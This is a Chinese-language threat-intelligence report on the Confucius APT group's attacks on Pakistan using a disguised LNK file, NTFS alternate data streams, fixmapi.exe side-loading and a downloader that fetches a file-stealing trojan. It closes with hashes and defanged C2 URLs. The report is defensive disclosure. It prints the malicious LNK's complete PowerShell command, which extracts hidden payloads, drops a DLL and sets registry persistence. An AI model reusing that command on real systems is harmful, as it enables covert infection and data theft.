Confucius 组织,又被称“魔罗桫”,该组织自2013年开始活跃,攻击行动主要目的是获取敏感信息。
我们在日常威胁狩猎中观察到该组织的持续活动,主要针对巴基斯坦地区进行攻击,并使用了ADS(Alternate Data Streams)特性来隐藏恶意文件,这种技术在之前该组织的攻击活动中未出现过。鉴于此,我们重点披露该组织使用ADS加载恶意组件的整个流程,以便用户及时发现,避免中招。
攻击入口为一个压缩包,文件名称为“Hajj_Advisory.rar”。
MD5 | fbcac2eb16586813275d2e25ec57142e |
文件名称 | Hajj_Advisory.rar |
文件大小 | 131.71 KB (134871 字节) |
解压后的LNK文件基本信息如下:
MD5 | fc81c75276fb21ccebb3ab6a4aac2239 |
文件名称 | Hajj_Advisory.pdf.lnk |
文件大小 | 3.04 KB (3113 字节) |
"$abc = Get-ChildItem -Path $env:TMP -Recurse -Name 'Hajj_Advisory.pdf.lnk' -Depth 1;if ($null -eq $abc) { $abc = Get-ChildItem -Path .\ -Recurse -Name 'Hajj_Advisory.pdf.lnk' -Depth 1;$ab = Join-Path -Path $(pwd).path -ChildPath $abc} else {$ab = Join-Path -Path $env:TMP -ChildPath $abc};$asx = Get-Content -Path $ab -Stream Apple -Raw; $ctor = 'C:\Program Files\Ava' + 'st So' + 'ftware'; if (-Not (Test-Path -Path $ctor)) { $pa = $env:LocalAppData} else {$pa = 'C:\ProgramData'}; Set-Content -Path (Join-Path -Path $pa -ChildPath '\mapistub.dll') -Value $asx -NoNewline;$asy = Get-Content -Path $ab -Stream Banana -Raw;Set-Content -Path (Join-Path -Path $env:TMP -ChildPath '\file.pdf') -Value $asy -NoNewline;$abz = $env:TMP + '\file.pdf'; start $abz; $c = Join-Path -Path $pa -ChildPath '\BlueApple.exe';Copy-Item -Path C:\Windows\System32\fixmapi.exe -Destination $c;REG ADD 'HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows' /v load /f /d $c;if (-Not (Test-Path -Path $ctor)) {start $c}"
Hajj_Advisory.pdf.lnk:Banana实际上是个PDF文件,该文件是巴基斯坦宗教事务和宗教间和谐部关于增加朝圣预算的说明文件。
mapistub.dll(Hajj_Advisory.pdf.lnk:Apple,md5为e0802b79ad53e9b8251034255d759b90)是一个C#编写的第一阶段下载器,该程序一旦被加载,就会分别从https[:]//coldchikenshop29.info/NroWSNCK83.tut或者https[:]//greenearthtreeh.info/UcoBeA.tut处远程下载并内存加载下一阶段载荷。这两个远程下载链接是同一个文件。
下载的文件基本信息如下:
MD5 | 0474c1ff499c5d6a25f4f1893cfbc5a5 |
文件名称 | ClassLibrary1.dll |
文件大小 | 18.0 KB (18,432 字节) |
ClassLibrary1.dll是mapistub.dll从远端下载并在内存加载而来,该文件是一个C#编写的文件窃取木马。
通过对样本整体分析,我们发现本次攻击行动与该组织之前使用LNK文件释放的最终载荷类似。
1.本次攻击使用了ADS交换数据流用来隐藏文件,但是和之前的攻击行动类似,都是使用白加黑组件,并且都使用了fixmapi.exe进行侧加载;
2.本次攻击使用的第一层加载器与之前类似,只是本次攻击存在两个远程链接,之前只有一个下一层载荷链接,这里避免了单一链接出现访问错误的情况。此外本次攻击使用的加载器以及最终下载的载荷都添加了大量无用代码,增加了分析的难度,如下图所示;
3.本次攻击最终载荷增加了文件收集的范围,之前只是收集C:\Users\[username]\下制定文件夹下的文件,本次攻击除了收集这部分文件以外,还收集了其他盘符下的文件,以及C盘的除特定文件夹以外的文件。
整个加载过程、样本载荷并结合攻击目标等信息来看,都与Confucius组织完全吻合。
fbcac2eb16586813275d2e25ec57142e
fc81c75276fb21ccebb3ab6a4aac2239
e0802b79ad53e9b8251034255d759b90
0474c1ff499c5d6a25f4f1893cfbc5a5
http[:]//whitemissycorp.info/VueWsxpogcjwq1.php
http[:]//whitemissycorp.info/HprodXprnvlm1.php
https[:]//coldchikenshop29.info/NroWSNCK83.tut
https[:]//greenearthtreeh.info/UcoBeA.tut